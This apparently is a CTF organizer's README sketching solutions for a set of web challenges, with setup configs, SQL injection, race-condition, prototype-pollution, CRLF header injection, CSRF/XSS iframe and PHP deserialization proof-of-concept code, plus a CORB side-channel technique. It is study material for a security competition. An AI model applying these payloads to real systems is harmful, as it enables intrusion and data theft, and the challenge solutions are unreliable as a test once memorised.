Thank you all for participating! This README contains my writeup sketches. You can also share your writeup on CTFtime.
git clone
cd 2020 && docker-compose up
The mapping is as following
localhost:1000 -> CORBra // CAVEAT: only solvable over HTTPS
localhost:1001 -> Customer
localhost:1002 -> Faster Shop
localhost:1003 -> KVaaS
localhost:1004 -> lightSequel
localhost:1005 -> Note App
localhost:1006 -> Note App 2
localhost:1007 -> Note App 3
localhost:1008 -> urlLongener
If you are using NGINX:
server {
listen 80;
location / {
proxy_pass http://localhost:1000/;
server {
listen 80;
server_name customer.*;
location / {
proxy_pass http://localhost:1001/;
server {
listen 80;
server_name kvaas.*;
location / {
proxy_pass http://localhost:1003/;
server {
listen 80;
server_name na1.*;
location / {
proxy_pass http://localhost:1005/;
server {
listen 80;
server_name na2.*;
location / {
proxy_pass http://localhost:1006/;
server {
listen 80;
server_name na3.*;
location / {
proxy_pass http://localhost:1007/;
server {
listen 80;
server_name url.*;
location / {
proxy_set_header Host $host;
proxy_pass http://localhost:1008/;
* lightSequel and Faster Shop are less solvable behind NGINX so they are not proxied
151 solves / 10 pts
Description: We have hidden a flag at our API endpoint! Happy hunting.
You can find the URL of API by checking dev tool's Network tab.
31 solves / 20 pts
Description: Could you get footage of CCTV at this location? Send your Proof of Concept to @shou on Slack.
Hint 1: All CCTVs are protected by password, but how about services depending on them? Please don't spam anyone : )
Search on Google and you would find this
212 solves / 100 pts
Description: Write your diary on Shou's note app so he can eavesdrop every single byte of it!!!
After login, visit http://host/note/1
89 solves / 341 pts
Description: Obviously, angr cannot solve this challenge. Note 1: wrap whatever you get with we{}
The code is obfuscated with YAK Pro. You can find unobfuscated one in this repo.
82 solves / 345 pts
Description: Be as fast as possible to fast!
No lock presents in db queries. PoC:
from requests import post
from multiprocessing import *
import time
def f():
post("http://host/buy/1", headers={
"cookie": "token=[YOUR TOKEN]"
for i in range(20):
p = Process(target=f)
47 solves / 382 pts
Description: Shou just told admins in his company not to click any link sent by unknowns but they are just too ignorant and assume Chrome is so secure…
You can simply generate payload with any existing tool for CSRF profiling.
24 solves / 1174 pts
Description: Shou just learnt gRPC! Go play with his nasty API!
CAVEAT 1: a hostname is given but obviously only IP works
Code that causes SQL Injection:
// main.go:L69
Where(fmt.Sprintf("user_id = (SELECT id FROM users WHERE token = '%s')", userToken)).
PoC (bruteforce each character):
md := metadata.Pairs("user_token", "1' OR (SELECT COUNT(*) FROM flags WHERE flag LIKE '%we{%') > 0))/*")
ctx = metadata.NewOutgoingContext(context.Background(), md)
var header, trailer metadata.MD
r, err := c.GetLoginHistory(ctx, &pb.SrvRequest{}, grpc.Header(&header), grpc.Trailer(&trailer))
21 solves / 1219 pts
Description: Shou, after successfully created all those Apps, starts to get ballsier and claims that every database should use HTTP to communicate with the client. Thus, he rewrites Redis in his favorite language Javascript and announces he created first KVaaS.
curl http://host/set?user_token=__proto__&key=redis_set&value=[YOUR COMMAND];
curl -X PUT http://host/backup
7 solves / 1635 pts
Description: Shou just made a few updates to the former Note App: added logout function, allowed writing HTML in notes, and most importantly made everything more (un)secured. Note 1: Note App's issue is addressed here.
main.html (some code borrowed from
<div id=iframe1></div>
<div id=iframe2></div>
<div id=iframe3></div>
<div id=iframe4></div>
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
async function main(){
ifr = document.createElement('iframe');
ifr.src = "http://[HOST]/note/1";'admin';
await sleep(1000);
ifr2 = document.createElement('iframe');'attack';
ifr2.src = "/test2.html";
await sleep(1000);
ifr3 = document.createElement('iframe');'attack';
ifr3.src = "/test3.html";
await sleep(1000);
ifr4 = document.createElement('iframe');'attack';
ifr4.src = "http://[HOST]/note/5"; // <- Your note with code e.g.:
// <script>console.log([0].document.getElementsByTagName('p')[0].innerText)<script>
<form method="post" action="http://[HOST]/logout" id="s">
<input type="submit">
<form method="post" action="http://[HOST]/" id="s">
<input name="username" value="[YOUR CREDENTIAL]">
<input name="password" value="[YOUR CREDENTIAL]">
<input type="submit">
2 solves / 1942 pts
Description: PHP is the most production-ready and CTF-challenge-ready language huh?
Make POP chain to pwn /api/
so as to insert HTML without sanitization.
namespace Objects{class User{public function __construct($username = "", $password = "", $id = 0, $token = ""){$this->username = $username;$this->password = $password;$this->token = $token;$this->id = $id;}public function set_enc_password($password){ $this->password = $password; }}class Note{public function __construct(User $author = null, $content = "", $id = 0, $token = ''){$this->id = $id;$this->author = $author;$this->content = $content;$this->token = $token;}}}
namespace Events {use Objects\Note;class NoteInsert{private $note;public function __construct(Note $n){$this->note = $n;}}}
namespace a{
$user = new \Objects\User("[YOUR USERNAME]", "", 1, "");
$note = new \Objects\Note($user, "<script>alert(1)</script>", 0, "");
$ob = new \Events\NoteInsert($note);
echo serialize($user);
After getting XSS works, bypass sandbox by using an iframe and control the hash.
8 solves / 1586 pts
Description: Shou just wrote a short url generator to generate not so short urls Note 1: Flag is in the link admin created. Each user needs to be in the same IP and UA to get access their data. Note 2: Server is running on a patched version to compensate the NGINX issue. Code here is solely for providing some insights. Do not test your payload on it .
curl http://host/redirect?location=abc\r\na: b
Then get admin token:
This line
ensures no XSS code could be injected. However, we can inject headers like following, so any website can get the whole response, including JWT, from chall website:
Access-Control-Allow-Credential: true
Access-Control-Allow-Origin: *
Then fake your IP with X-Forwarded-For
and all set : )
^ It is actually not correct as pointed out in writeup by @dshynkev. The reason is this app is served behind NGINX during the CTF, so all requests' IP is My bad : (
1 solve / 2000 pts
🎉 Team lsof -i:80
is the only team that solved this completely. Good Job!!
Description: Shou stores one flag in his fancy CORBra Vault. Hint 1: You may need CVE-2020-6442
It is impossible to bypass CORB check in HTML, but for JSON, notice that:
if ($limit > 0){
if ($limit > count($secret_arr)){
trigger_error("Limit is greater than length of array!", E_USER_WARNING);
which produce a JSON with warning HTML that disrupts the following check:
// Simplified code from Chromium
// Full code:;l=459
int SniffForJSON(char* data, int size) {
enum {
} state = kStartState;
for (int i = 0; i < size; ++i) {
const char c = data[i];
if (state != kLeftQuoteState && state != kEscapeState) {
// Whitespace is ignored (outside of string literals)
if (c == ' ' || c == '\t' || c == '\r' || c == '\n')
} else {
// Inside string literals, control characters should result in rejection.
if ((c >= 0 && c < 32) || c == 127)
return 0;
switch (state) {
case kStartState:
if (c == '{')
state = kLeftBraceState;
return 0;
case kLeftBraceState:
if (c == '"')
state = kLeftQuoteState;
return 0;
case kLeftQuoteState:
if (c == '"')
state = kRightQuoteState;
else if (c == '\\')
state = kEscapeState;
case kEscapeState:
// Simplification: don't bother rejecting hex escapes.
state = kLeftQuoteState;
case kRightQuoteState:
if (c == ':')
return 2;
return 0;
return 1;
Note that CORBra-- is considered to be solved if participants reach this step and managed to get cache diff works on same origin.
Then, use following CVE to conduct XS-Search: @posix and @DayDun manage to reproduce part of this. One key factor to concern is that the algorithm is like
what you can get =
bytes of requests without cookie + bytes of random padding -
(bytes of requests with cookie + bytes of same random padding)
- There are 712 teams from 26 different countries registered their account.
- Infrastructure has served 2.8TB requests.
- There are up to 257 teams solved at least one challenge.
- Congrats to
,lsof -i:80
, which are respectively first, second, and third place.
What have I screwed up:
- KVaaS: I did not proofread my JS code carefully, leaving two small typos. Moreover, I forgot to test it (I really put it on my note) remotely, leaving the flag file empty at the beginning due to Docker not passing args and read-only system issues. I am super sorry for the inconvinience I have created : (
- urlLongener: I did not notice the request altering caused by NGINX as well as AJAX, which creates ambiguity on the source code. It is fixed after 13PM PDT.
- Quota in Google Cloud prevented me from creating more than 32 cores. So, I have to migrate some instance to another account and pay for them : (